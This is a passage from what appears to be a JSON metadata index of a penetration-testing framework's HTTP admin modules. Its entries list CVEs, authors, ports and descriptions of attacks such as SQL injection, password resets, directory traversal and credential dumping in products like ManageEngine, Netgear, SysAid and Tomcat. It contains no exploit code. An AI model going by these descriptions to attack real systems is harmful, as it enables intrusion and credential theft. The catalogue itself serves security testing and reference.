"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/manageengine_file_download.rb",
"is_install_path": true,
"ref_name": "admin/http/manageengine_file_download",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/manageengine_pmp_privesc": {
"name": "ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection",
"full_name": "auxiliary/admin/http/manageengine_pmp_privesc",
"rank": 300,
"disclosure_date": "2014-11-08",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "ManageEngine Password Manager Pro (PMP) has an authenticated blind SQL injection\n vulnerability in SQLAdvancedALSearchResult.cc that can be abused to escalate\n privileges and obtain Super Administrator access. A Super Administrator can then\n use his privileges to dump the whole password database in CSV format. PMP can use\n both MySQL and PostgreSQL databases but this module only exploits the latter as\n MySQL does not support stacked queries with Java. PostgreSQL is the default database\n in v6.8 and above, but older PMP versions can be upgraded and continue using MySQL,\n so a higher version does not guarantee exploitability. This module has been tested\n on v6.8 to v7.1 build 7104 on both Windows and Linux. The vulnerability is fixed in\n v7.1 build 7105 and above.",
"references": [
"CVE-2014-8499",
"OSVDB-114485",
"URL-https://seclists.org/fulldisclosure/2014/Nov/18",
"URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_pmp_privesc.txt"
],
"platform": "",
"arch": "",
"rport": 7272,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb",
"is_install_path": true,
"ref_name": "admin/http/manageengine_pmp_privesc",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/mantisbt_password_reset": {
"name": "MantisBT password reset",
"full_name": "auxiliary/admin/http/mantisbt_password_reset",
"rank": 300,
"disclosure_date": "2017-04-16",
"type": "auxiliary",
"author": [
"John (hyp3rlinx) Page",
"Julien (jvoisin) Voisin"
],
"description": "MantisBT versions before 1.3.10, 2.2.4, and 2.3.1 are vulnerable to unauthenticated password reset.",
"references": [
"CVE-2017-7615",
"EDB-41890",
"URL-https://mantisbt.org/bugs/view.php?id=22690",
"URL-http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/mantisbt_password_reset.rb",
"is_install_path": true,
"ref_name": "admin/http/mantisbt_password_reset",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/mutiny_frontend_read_delete": {
"name": "Mutiny 5 Arbitrary File Read and Delete",
"full_name": "auxiliary/admin/http/mutiny_frontend_read_delete",
"rank": 300,
"disclosure_date": "2013-05-15",
"type": "auxiliary",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits the EditDocument servlet from the frontend on the Mutiny 5\n appliance. The EditDocument servlet provides file operations, such as copy and\n delete, which are affected by a directory traversal vulnerability. Because of this,\n any authenticated frontend user can read and delete arbitrary files from the system\n with root privileges. In order to exploit the vulnerability a valid user (any role)\n in the web frontend is required. The module has been tested successfully on the\n Mutiny 5.0-1.07 appliance.",
"references": [
"CVE-2013-0136",
"US-CERT-VU-701572",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb",
"is_install_path": true,
"ref_name": "admin/http/mutiny_frontend_read_delete",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/netflow_file_download": {
"name": "ManageEngine NetFlow Analyzer Arbitrary File Download",
"full_name": "auxiliary/admin/http/netflow_file_download",
"rank": 300,
"disclosure_date": "2014-11-30",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits an arbitrary file download vulnerability in CSVServlet\n on ManageEngine NetFlow Analyzer. This module has been tested on both Windows\n and Linux with versions 8.6 to 10.2. Note that when typing Windows paths, you\n must escape the backslash with a backslash.",
"references": [
"CVE-2014-5445",
"OSVDB-115340",
"URL-https://seclists.org/fulldisclosure/2014/Dec/9",
"URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_netflow_it360_file_dl.txt"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/netflow_file_download.rb",
"is_install_path": true,
"ref_name": "admin/http/netflow_file_download",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/netgear_auth_download": {
"name": "NETGEAR ProSafe Network Management System 300 Authenticated File Download",
"full_name": "auxiliary/admin/http/netgear_auth_download",
"rank": 300,
"disclosure_date": "2016-02-04",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.\n The application has a file download vulnerability that can be exploited by an\n authenticated remote attacker to download any file in the system.\n This module has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13.",
"references": [
"CVE-2016-1524",
"US-CERT-VU-777024",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt",
"URL-https://seclists.org/fulldisclosure/2016/Feb/30"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/netgear_auth_download.rb",
"is_install_path": true,
"ref_name": "admin/http/netgear_auth_download",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/netgear_soap_password_extractor": {
"name": "Netgear Unauthenticated SOAP Password Extractor",
"full_name": "auxiliary/admin/http/netgear_soap_password_extractor",
"rank": 300,
"disclosure_date": "2015-02-11",
"type": "auxiliary",
"author": [
"Peter Adkins <peter.adkins@kernelpicnic.net>",
"Michael Messner <devnull@s3cur1ty.de>",
"h00die <mike@shorebreaksecurity.com>"
],
"description": "This module exploits an authentication bypass vulnerability in different Netgear devices.\n It allows extracting the password for the remote management interface. This module has been\n tested on a Netgear WNDR3700v4 - V1.0.1.42, but other devices are reported as vulnerable:\n NetGear WNDR3700v4 - V1.0.0.4SH, NetGear WNDR3700v4 - V1.0.1.52, NetGear WNR2200 - V1.0.1.88,\n NetGear WNR2500 - V1.0.0.24, NetGear WNDR3700v2 - V1.0.1.14 (Tested by Paula Thomas),\n NetGear WNDR3700v1 - V1.0.16.98 (Tested by Michal Bartoszkiewicz),\n NetGear WNDR3700v1 - V1.0.7.98 (Tested by Michal Bartoszkiewicz),\n NetGear WNDR4300 - V1.0.1.60 (Tested by Ronny Lindner),\n NetGear R6300v2 - V1.0.3.8 (Tested by Robert Mueller),\n NetGear WNDR3300 - V1.0.45 (Tested by Robert Mueller),\n NetGear WNDR3800 - V1.0.0.48 (Tested by an Anonymous contributor),\n NetGear WNR1000v2 - V1.0.1.1 (Tested by Jimi Sebree),\n NetGear WNR1000v2 - V1.1.2.58 (Tested by Chris Boulton),\n NetGear WNR2000v3 - v1.1.2.10 (Tested by h00die)",
"references": [
"BID-72640",
"OSVDB-118316",
"URL-https://github.com/darkarnium/secpub/tree/master/NetGear/SOAPWNDR"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-10-09 17:06:05 +0000",
"path": "/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb",
"is_install_path": true,
"ref_name": "admin/http/netgear_soap_password_extractor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/netgear_wnr2000_pass_recovery": {
"name": "NETGEAR WNR2000v5 Administrator Password Recovery",
"full_name": "auxiliary/admin/http/netgear_wnr2000_pass_recovery",
"rank": 300,
"disclosure_date": "2016-12-20",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "The NETGEAR WNR2000 router has a vulnerability in the way it handles password recovery.\n This vulnerability can be exploited by an unauthenticated attacker who is able to guess\n the value of a certain timestamp which is in the configuration of the router.\n Brute forcing the timestamp token might take a few minutes, a few hours, or days, but\n it is guaranteed that it can be bruteforced.\n This module works very reliably and it has been tested with the WNR2000v5, firmware versions\n 1.0.0.34 and 1.0.0.18. It should also work with the hardware revisions v4 and v3, but this\n has not been tested.",
"references": [
"CVE-2016-10175",
"CVE-2016-10176",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt",
"URL-https://seclists.org/fulldisclosure/2016/Dec/72",
"URL-http://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/netgear_wnr2000_pass_recovery.rb",
"is_install_path": true,
"ref_name": "admin/http/netgear_wnr2000_pass_recovery",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/nexpose_xxe_file_read": {
"name": "Nexpose XXE Arbitrary File Read",
"full_name": "auxiliary/admin/http/nexpose_xxe_file_read",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>",
"Drazen Popovic <drazen.popvic@infigo.hr>",
"Bojan Zdrnja <bojan.zdrnja@infigo.hr>"
],
"description": "Nexpose v5.7.2 and prior is vulnerable to an XML External Entity attack via a number\n of vectors. This vulnerability can allow an attacker to craft special XML that\n could read arbitrary files from the filesystem. This module exploits the\n vulnerability via the XML API.",
"references": [
"URL-https://community.rapid7.com/community/nexpose/blog/2013/08/16/r7-vuln-2013-07-24"
],
"platform": "",
"arch": "",
"rport": 3780,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-10-09 17:06:05 +0000",
"path": "/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb",
"is_install_path": true,
"ref_name": "admin/http/nexpose_xxe_file_read",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/novell_file_reporter_filedelete": {
"name": "Novell File Reporter Agent Arbitrary File Delete",
"full_name": "auxiliary/admin/http/novell_file_reporter_filedelete",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Luigi Auriemma",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "NFRAgent.exe in Novell File Reporter allows remote attackers to delete\n arbitrary files via a full pathname in an SRS request with OPERATION set to 4 and\n CMD set to 5 against /FSF/CMD. This module has been tested successfully on NFR\n Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1) on\n Windows platforms.",
"references": [
"CVE-2011-2750",
"OSVDB-73729",
"URL-http://aluigi.org/adv/nfr_2-adv.txt"
],
"platform": "",
"arch": "",
"rport": 3037,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb",
"is_install_path": true,
"ref_name": "admin/http/novell_file_reporter_filedelete",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/nuuo_nvrmini_reset": {
"name": "NUUO NVRmini 2 / NETGEAR ReadyNAS Surveillance Default Configuration Load and Administrator Password Reset",
"full_name": "auxiliary/admin/http/nuuo_nvrmini_reset",
"rank": 300,
"disclosure_date": "2016-08-04",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "The NVRmini 2 Network Video Recorder and the ReadyNAS Surveillance application are vulnerable\n to an administrator password reset on the exposed web management interface.\n Note that this only works for unauthenticated attackers in earlier versions of the Nuuo firmware\n (before v1.7.6), otherwise you need an administrative user password.\n This exploit has been tested on several versions of the NVRmini 2 and the ReadyNAS Surveillance.\n It probably also works on the NVRsolo and other Nuuo devices, but it has not been tested\n on those devices.",
"references": [
"CVE-2016-5676",
"US-CERT-VU-856152",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-nvr-vulns.txt",
"URL-https://seclists.org/bugtraq/2016/Aug/45"
],
"platform": "",
"arch": "",
"rport": 8081,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/nuuo_nvrmini_reset.rb",
"is_install_path": true,
"ref_name": "admin/http/nuuo_nvrmini_reset",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/openbravo_xxe": {
"name": "Openbravo ERP XXE Arbitrary File Read",
"full_name": "auxiliary/admin/http/openbravo_xxe",
"rank": 300,
"disclosure_date": "2013-10-30",
"type": "auxiliary",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "The Openbravo ERP XML API expands external entities which can be defined as\n local files. This allows the user to read any files from the FS as the\n user Openbravo is running as (generally not root).\n\n This module was tested against Openbravo ERP version 3.0MP25 and 2.50MP6.",
"references": [
"CVE-2013-3617",
"OSVDB-99141",
"BID-63431",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/admin/http/openbravo_xxe.rb",
"is_install_path": true,
"ref_name": "admin/http/openbravo_xxe",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/pfadmin_set_protected_alias": {
"name": "Postfixadmin Protected Alias Deletion Vulnerability",
"full_name": "auxiliary/admin/http/pfadmin_set_protected_alias",
"rank": 300,
"disclosure_date": "2017-02-03",
"type": "auxiliary",
"author": [
"Jan-Frederik Rieckers"
],
"description": "Postfixadmin installations between 2.91 and 3.0.1 do not check if an\n admin is allowed to delete protected aliases. This vulnerability can be\n used to redirect protected aliases to another mail address, e.g. to rewrite\n the postmaster@domain alias.",
"references": [
"CVE-2017-5930",
"URL-https://github.com/postfixadmin/postfixadmin/pull/23",
"BID-96142"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-12-30 13:03:36 +0000",
"path": "/modules/auxiliary/admin/http/pfadmin_set_protected_alias.rb",
"is_install_path": true,
"ref_name": "admin/http/pfadmin_set_protected_alias",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/rails_devise_pass_reset": {
"name": "Ruby on Rails Devise Authentication Password Reset",
"full_name": "auxiliary/admin/http/rails_devise_pass_reset",
"rank": 300,
"disclosure_date": "2013-01-28",
"type": "auxiliary",
"author": [
"joernchen",
"jjarmoc"
],
"description": "The Devise authentication gem for Ruby on Rails is vulnerable\n to a password reset exploit leveraging type confusion. By submitting XML\n to rails, we can influence the type used for the reset_password_token\n parameter. This allows for resetting passwords of arbitrary accounts,\n knowing only the associated email address.\n\n This module defaults to the most common devise URIs and response values,\n but these may require adjustment for implementations which customize them.\n\n Affects Devise < v2.2.3, 2.1.3, 2.0.5 and 1.5.4 when backed by any database\n except PostgreSQL or SQLite3. Tested with v2.2.2, 2.1.2, and 2.0.4 on Rails\n 3.2.11. Patch applied to Rails 3.2.12 and 3.1.11 should prevent exploitation\n of this vulnerability, by quoting numeric values when comparing them with\n non numeric values.",
"references": [
"CVE-2013-0233",
"OSVDB-89642",
"BID-57577",
"URL-http://blog.plataformatec.com.br/2013/01/security-announcement-devise-v2-2-3-v2-1-3-v2-0-5-and-v1-5-3-released/",
"URL-http://www.phenoelit.org/blog/archives/2013/02/05/mysql_madness_and_rails/index.html",
"URL-https://github.com/rails/rails/commit/921a296a3390192a71abeec6d9a035cc6d1865c8",
"URL-https://github.com/rails/rails/commit/26e13c3ca71cbc7859cc4c51e64f3981865985d8"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/rails_devise_pass_reset.rb",
"is_install_path": true,
"ref_name": "admin/http/rails_devise_pass_reset",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/scadabr_credential_dump": {
"name": "ScadaBR Credentials Dumper",
"full_name": "auxiliary/admin/http/scadabr_credential_dump",
"rank": 300,
"disclosure_date": "2017-05-28",
"type": "auxiliary",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module retrieves credentials from ScadaBR, including\n service credentials and unsalted SHA1 password hashes for\n all users, by invoking the 'EmportDwr.createExportData' DWR\n method of Mango M2M which is exposed to all authenticated\n users regardless of privilege level.\n\n This module has been tested successfully with ScadaBR\n versions 1.0 CE and 0.9 on Windows and Ubuntu systems.",
"references": [
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/auxiliary/admin/http/scadabr_credential_dump.rb",
"is_install_path": true,
"ref_name": "admin/http/scadabr_credential_dump",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/scrutinizer_add_user": {
"name": "Plixer Scrutinizer NetFlow and sFlow Analyzer HTTP Authentication Bypass",
"full_name": "auxiliary/admin/http/scrutinizer_add_user",
"rank": 300,
"disclosure_date": "2012-07-27",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>",
"Jonathan Claudius",
"Tanya Secker",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This will add an administrative account to Scrutinizer NetFlow and sFlow Analyzer\n without any authentication. Versions such as 9.0.1 or older are affected.",
"references": [
"CVE-2012-2626",
"OSVDB-84318",
"URL-https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/scrutinizer_add_user.rb",
"is_install_path": true,
"ref_name": "admin/http/scrutinizer_add_user",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/sophos_wpa_traversal": {
"name": "Sophos Web Protection Appliance patience.cgi Directory Traversal",
"full_name": "auxiliary/admin/http/sophos_wpa_traversal",
"rank": 300,
"disclosure_date": "2013-04-03",
"type": "auxiliary",
"author": [
"Wolfgang Ettlingers",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses a directory traversal in Sophos Web Protection Appliance, specifically\n on the /cgi-bin/patience.cgi component. This module has been tested successfully on the\n Sophos Web Virtual Appliance v3.7.0.",
"references": [
"CVE-2013-2641",
"OSVDB-91953",
"BID-58833",
"EDB-24932",
"URL-http://www.sophos.com/en-us/support/knowledgebase/118969.aspx",
"URL-https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130403-0_Sophos_Web_Protection_Appliance_Multiple_Vulnerabilities.txt"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/sophos_wpa_traversal.rb",
"is_install_path": true,
"ref_name": "admin/http/sophos_wpa_traversal",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/sysaid_admin_acct": {
"name": "SysAid Help Desk Administrator Account Creation",
"full_name": "auxiliary/admin/http/sysaid_admin_acct",
"rank": 300,
"disclosure_date": "2015-06-03",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated\n user to create an administrator account. Note that this exploit will only work once. Any\n subsequent attempts will fail. On the other hand, the credentials must be verified\n manually. This module has been tested on SysAid 14.4 in Windows and Linux.",
"references": [
"CVE-2015-2993",
"URL-https://seclists.org/fulldisclosure/2015/Jun/8",
"URL-https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/sysaid_admin_acct.rb",
"is_install_path": true,
"ref_name": "admin/http/sysaid_admin_acct",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/sysaid_file_download": {
"name": "SysAid Help Desk Arbitrary File Download",
"full_name": "auxiliary/admin/http/sysaid_file_download",
"rank": 300,
"disclosure_date": "2015-06-03",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits two vulnerabilities in SysAid Help Desk that allow\n an unauthenticated user to download arbitrary files from the system. First, an\n information disclosure vulnerability (CVE-2015-2997) is used to obtain the file\n system path, and then we abuse a directory traversal (CVE-2015-2996) to download\n the file. Note that there are some limitations on Windows, in that the information\n disclosure vulnerability doesn't work on a Windows platform, and we can only\n traverse the current drive (if you enter C:\\afile.txt and the server is running\n on D:\\ the file will not be downloaded).\n\n This module has been tested with SysAid 14.4 on Windows and Linux.",
"references": [
"CVE-2015-2996",
"CVE-2015-2997",
"URL-https://seclists.org/fulldisclosure/2015/Jun/8",
"URL-https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/sysaid_file_download.rb",
"is_install_path": true,
"ref_name": "admin/http/sysaid_file_download",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/sysaid_sql_creds": {
"name": "SysAid Help Desk Database Credentials Disclosure",
"full_name": "auxiliary/admin/http/sysaid_sql_creds",
"rank": 300,
"disclosure_date": "2015-06-03",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated\n user to download arbitrary files from the system. This is used to download the server\n configuration file that contains the database username and password, which is encrypted\n with a fixed, known key. This module has been tested with SysAid 14.4 on Windows and Linux.",
"references": [
"CVE-2015-2996",
"CVE-2015-2998",
"URL-https://seclists.org/fulldisclosure/2015/Jun/8",
"URL-https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/sysaid_sql_creds.rb",
"is_install_path": true,
"ref_name": "admin/http/sysaid_sql_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/telpho10_credential_dump": {
"name": "Telpho10 Backup Credentials Dumper",
"full_name": "auxiliary/admin/http/telpho10_credential_dump",
"rank": 300,
"disclosure_date": "2016-09-02",
"type": "auxiliary",
"author": [
"Jan Rude"
],
"description": "This module exploits a vulnerability present in all versions of Telpho10 telephone system\n appliance. This module generates a configuration backup of Telpho10,\n downloads the file and dumps the credentials for admin login,\n phpmyadmin, phpldapadmin, etc.\n This module has been successfully tested on the appliance versions 2.6.31 and 2.6.39.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-05-23 09:32:41 +0000",
"path": "/modules/auxiliary/admin/http/telpho10_credential_dump.rb",
"is_install_path": true,
"ref_name": "admin/http/telpho10_credential_dump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/tomcat_administration": {
"name": "Tomcat Administration Tool Default Access",
"full_name": "auxiliary/admin/http/tomcat_administration",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "Detect the Tomcat administration interface. The administration interface is included in versions 5.5 and lower.\n Port 8180 is the default for FreeBSD, 8080 for all others.",
"references": [
"URL-http://tomcat.apache.org/"
],
"platform": "",
"arch": "",
"rport": 8180,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-08-21 08:50:26 +0000",
"path": "/modules/auxiliary/admin/http/tomcat_administration.rb",
"is_install_path": true,
"ref_name": "admin/http/tomcat_administration",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/tomcat_utf8_traversal": {
"name": "Tomcat UTF-8 Directory Traversal Vulnerability",
"full_name": "auxiliary/admin/http/tomcat_utf8_traversal",
"rank": 300,
"disclosure_date": "2009-01-09",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>",
"guerrino <ruggine> di massa"
],
"description": "This module tests whether a directory traversal vulnerability is present\n in versions of Apache Tomcat 4.1.0 - 4.1.37, 5.5.0 - 5.5.26 and 6.0.0\n - 6.0.16 under specific and non-default installations. The connector must have\n allowLinking set to true and URIEncoding set to UTF-8. Furthermore, the\n vulnerability actually occurs within Java and not Tomcat; the server must\n use Java versions prior to Sun 1.4.2_19, 1.5.0_17, 6u11 - or prior IBM Java\n 5.0 SR9, 1.4.2 SR13, SE 6 SR4 releases. This module has only been tested against\n RedHat 9 running Tomcat 6.0.16 and Sun JRE 1.5.0-05. You may wish to change\n FILE (hosts,sensitive files), MAXDIRS and RPORT depending on your environment.",
"references": [
"URL-http://tomcat.apache.org/",
"OSVDB-47464",
"CVE-2008-2938",
"URL-http://www.securityfocus.com/archive/1/499926"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-10-19 04:16:26 +0000",
"path": "/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb",
"is_install_path": true,
"ref_name": "admin/http/tomcat_utf8_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/trendmicro_dlp_traversal": {
"name": "TrendMicro Data Loss Prevention 5.5 Directory Traversal",
"full_name": "auxiliary/admin/http/trendmicro_dlp_traversal",
"rank": 300,
"disclosure_date": "2009-01-09",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module tests whether a directory traversal vulnerability is present\n in Trend Micro DLP (Data Loss Prevention) Appliance v5.5 build <= 1294.\n The vulnerability appears to be actually caused by the Tomcat UTF-8\n bug which is implemented in module tomcat_utf8_traversal CVE 2008-2938.\n This module simply tests for the same bug with Trend Micro specific settings.\n Note that in the Trend Micro appliance, /etc/shadow is not used and therefore\n password hashes are stored and anonymously accessible in the passwd file.",
"references": [
"URL-http://tomcat.apache.org/",
"OSVDB-47464",
"OSVDB-73447",
"CVE-2008-2938",
"URL-http://www.securityfocus.com/archive/1/499926",
"EDB-17388",
"BID-48225"
],
"platform": "",
"arch": "",
